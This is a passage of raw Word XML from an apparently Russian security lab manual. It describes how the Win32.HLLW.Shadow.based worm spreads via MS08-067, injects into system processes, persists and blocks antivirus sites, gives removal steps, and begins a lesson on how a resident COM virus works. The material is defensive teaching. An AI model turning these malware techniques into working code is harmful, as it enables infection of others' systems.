          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тене Microsoft MS08-067. На целевой компьютер отправляется специально сформированный запрос, приводящий к переполнению буфера. В результате данных действий компьютер-жертва загружает вредоносный файл по проток</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лу HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Деструктивная деятельность</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>После запуска Win32.HLLW.Shadow.based проверяет, в каком процессе он находится, и если это процесс rundll32.exe, то внедряет свой код в системные процессы svchost.exe и explorer.exe. Затем вирус открывает в Проводнике тек</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щую папку и прекращает свою работу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если Win32.HLLW.Shadow.based определяет, что он находится не в пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>цессе rundll32.exe, то он создает свою копию со случайным именем и пропис</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вает её в качестве службы Windows, а также в реестр для обеспечения автоз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пуска после перезагрузки компьютера и останавливает работу службы обно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ления Windows. Далее в системе устанавливается собственная реализация HTTP-сервера, с помощью которого начинается распространение вируса по с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если вирус определяет, что он находится в процессе svchost.exe, зап</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щенном в качестве DNS-клиента, то внедряет свой код в функции работы DNS на компьютере, тем самым блокируя доступ к сайтам множества антивирусных компаний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В состав Win32.HLLW.Shadow.based входит драйвер, в функционал кот</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рого входит изменение в памяти системного файла tcpip.sys с целью увеличения стандартного ограничения системы на количество одновременных сетевых подключений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рекомендации по удалению</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Установить патчи, указанные в следующих информационных бюллетенях Microsoft: MS08-067; MS08-068; MS09-001.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отключить компьютер от локальной сети и от Интернета. Если компь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>теры подсоединены к локальной сети, то вылеченный компьютер необходимо подключать обратно к локальной сети лишь после того, как будут вылечены все компьютеры, находящиеся в сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Скачать текущую версию утилиты Dr.Web CureIt! на неинфицированном компьютере, перенести ее на инфицированный и просканировать все диски, тем самым произведя лечение системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="cente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В работе необходимо исследовать вредоносную программу, а так же пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>извести:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Теоретическое описание известных путей распространения и форм проявления компьютерных вирусов </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Описание конкретных: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>путей распространения компьютерных вирусов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>форм проявления компьютерных вирусов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>действий по устранению работы компьютерных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>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pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Где можно взять описание работы компьютерных вирусов (конкре</w:t>
      </w:r>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ные примеры)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие есть пути распространения компьютерных вирусов?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ВОПРОСЫ И ЗАДАНИЯ ДЛЯ ЗАЩИТЫ РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие есть формы проявления компьютерных вирусов?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="0003074F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие формы проявления компьютерных вирусов наиболее нез</w:t>
      </w:r>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="0003074F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>метны для пользователя?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="125" w:name="_Toc503720805"/>
      <w:bookmarkStart w:id="126" w:name="_Toc3811332"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическое занятие 12</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>.  Изучение работы COM-вируса</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы –</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> изучить </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>работу COM-вируса.</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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Алгоритм работы COM – вируса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5894705" cy="1819910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="Содержимое 3" descr="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3" descr="3.emf"/>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94705" cy="1819910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рис.1 – Варианты внедрения вируса в программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5850890" cy="1898015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="Содержимое 3" descr="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3" descr="5.emf"/>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0890" cy="1898015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Рис.2 – Варианты внедрения вируса в программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5942965" cy="2029460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="Содержимое 3" descr="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3" descr="6.emf"/>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2965" cy="2029460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Рис.1 – Варианты внедрения вируса в программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Один из возможных алгоритмов работы резидентного COM - вируса . </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>По своей сути резидентный вирус отличается от обычной резидентной пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>граммы только тем, что он размножается сам по себе, независимо от желания пользователя. Значит,построить его можно по той же схеме, по которой пишу</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся обычные TSR - программы .Но сначала выясним,что должны делать секция инициализации вируса и его резидентная часть .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
